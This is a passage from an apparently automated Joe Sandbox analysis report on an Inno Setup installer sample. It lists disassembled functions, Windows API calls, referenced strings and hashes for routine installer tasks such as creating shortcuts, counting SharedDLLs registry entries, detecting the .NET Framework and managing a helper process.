                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                    • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                    • IPersistFile::Save, xrefs: 00456962
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance$FreeString
                                                                                                    • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                    • API String ID: 308859552-2363233914
                                                                                                    • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                    • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                    • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                    • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                      • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                    • API String ID: 2000705611-3672972446
                                                                                                    • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                    • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                    • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                    • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                    • API String ID: 1452528299-3112430753
                                                                                                    • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                    • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                    • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                    • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                      • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                    • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                    • API String ID: 59345061-4263478283
                                                                                                    • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                    • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                    • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                    • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                    • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                    • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                    • GetDC.USER32(00000000), ref: 0041B402
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                    • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 644427674-0
                                                                                                    • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                    • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                    • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                    • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                    • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                    • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                    • API String ID: 971782779-3668018701
                                                                                                    • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                    • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                    • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                    • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                      • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                    • RegOpenKeyEx, xrefs: 00454910
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                    • , xrefs: 004548FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                    • API String ID: 2812809588-1577016196
                                                                                                    • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                    • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                    • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                    • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                    Strings
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                    • .NET Framework version %s not found, xrefs: 00459609
                                                                                                    • .NET Framework not found, xrefs: 0045961D
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                    • v4.0.30319, xrefs: 004594F1
                                                                                                    • v1.1.4322, xrefs: 004595C2
                                                                                                    • v2.0.50727, xrefs: 0045955B
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$Open
                                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                    • API String ID: 2976201327-446240816
                                                                                                    • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                    • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                    • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                    • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                    Strings
                                                                                                    • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                    • Helper process exited., xrefs: 00458AC5
                                                                                                    • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                    • API String ID: 3355656108-1243109208
                                                                                                    • Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                    • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                    • Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
                                                                                                    • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                      • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                    Strings
                                                                                                    • RegCreateKeyEx, xrefs: 004545C3
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                    • , xrefs: 004545B1
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFormatMessageQueryValue
                                                                                                    • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                    • API String ID: 2481121983-1280779767
                                                                                                    • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                    • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                    • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                    • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                      • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                    • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                    • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                      • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                    • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                    • API String ID: 1549857992-2312673372
                                                                                                    • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                    • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                    • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                    • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
